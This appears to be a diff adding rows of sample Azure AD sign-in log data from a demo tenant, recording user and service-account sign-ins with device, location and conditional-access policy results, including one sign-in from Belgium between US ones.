+935,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:00.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f2cc469f-e0ca-0000-5421-793da02b04e5,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",89223cb6-60af-4a3e-b2e1-94704b0e1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,89223cb6-60af-4a3e-b2e1-94704b0e1400,SigninLogs,Sucess,41.90428925,-85.99833679
+936,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,16:59.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,461e7cae-a3f3-4e04-abd3-900490e195b3,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:16,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",d0efda67-c5f0-466a-9417-d05e06311300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,d0efda67-c5f0-466a-9417-d05e06311300,SigninLogs,Sucess,33.7984581,-84.38828278
+937,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,52:40.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,68962194-dc55-438d-b417-342efe72cccf,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:52,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Rich Client 3.19.7.16602'}",c95450b3-582d-4306-9dd2-9bdaf6b21100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.17196655273438, 'latitude': 38.73078155517578}, 'state': 'Virginia', 'city': 'Washington'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c95450b3-582d-4306-9dd2-9bdaf6b21100,SigninLogs,Sucess,38.73078156,-78.17196655
+938,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:02.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3e9fe24c-9df0-4808-b837-3e0e4a6bdbae,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",93ca542e-4eab-45c4-8608-b715042b1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,93ca542e-4eab-45c4-8608-b715042b1200,SigninLogs,Sucess,36.6404686,-78.26995087
+939,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,22:22.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c4b06619-c349-4e26-aa41-2e7e7ee7db3f,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:22,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",7ad10e9e-8b94-4b07-9307-1c32e3fc1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,7ad10e9e-8b94-4b07-9307-1c32e3fc1100,SigninLogs,Sucess,41.90428925,-85.99833679
+940,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,40:02.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c3297570-1392-4152-84ae-79e988ad8010,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:40,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",f4c49c86-cb9e-4a04-9dcc-1dcdcda91000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,f4c49c86-cb9e-4a04-9dcc-1dcdcda91000,SigninLogs,Sucess,41.90428925,-85.99833679
+941,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:21.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,440299fe-b0d4-4bd8-9027-599f1ecefeef,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",e9cd98cc-4177-459a-870c-d2e45f851200,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,e9cd98cc-4177-459a-870c-d2e45f851200,SigninLogs,Sucess,50.6406517,5.572050095
+942,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:23.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7c575f55-8526-4ecc-875e-cba78a455044,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:34,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",93ca542e-4eab-45c4-8608-b71578d11400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint 